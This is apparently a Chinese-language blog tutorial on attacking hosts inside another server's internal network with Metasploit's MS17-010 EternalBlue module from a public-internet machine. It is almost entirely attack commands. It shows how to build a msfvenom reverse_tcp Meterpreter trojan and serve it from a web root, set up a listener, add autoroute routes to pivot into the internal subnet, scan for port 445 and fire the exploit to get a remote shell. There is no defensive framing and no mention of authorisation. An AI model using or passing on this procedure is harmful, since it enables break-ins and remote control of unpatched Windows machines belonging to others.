其實很多小白在對利用msf進行ms17010攻擊的時候總是不成功,其實這都是因為網上大部分的文章都是寫的內網對內網(192.168.1.2-->192.168.1.3)這樣的案例,今天寫了一下利用公網的MSF直接攻擊其他服務器內網的案例。
一、准備工作
1.安裝了Msf的公網主機+Ubuntu系統
2.一台其他服務器內網存在445漏洞
3.細心,細心,細心,鑽研,鑽研!!!
二、反彈一個shell
第一步:公網主機操作
生成msf木馬:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的IP LPORT=6666 -f exe > /var/www/html/6666.exe
第二步:Msf監聽端口:6666
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 111.111.111.111
set LPORT 6666
exploit
添加路由
run get_local_subnets (獲取當前路由)
run autoroute -s 192.168.3.0/24 (添加路由)
run autorouute -d //刪除添加的路由 (有需要才用)
run autoroute -p (查看已添加路由)
使用Payload進行攻擊
background(轉換到后台)
use scanner/portscan/tcp (先掃描開放445端口的PC)
exploit(開始掃描)
注意:掃描出來開放了445端口的PC,不一定就存在445漏洞。(如何精准定位?)
如何列出那些存在445漏洞的PC?
使用MS17-010檢測工具檢測,github自行下載
攻擊正式開始
use exploit/windows/smb/ms17_010_eternalblue(切換到攻擊模塊)
set rhost 192.168.3.38(設置存在445漏洞的PC電腦IP)
exploit(執行攻擊)
攻擊完成,並且會自動返回一個shell控制台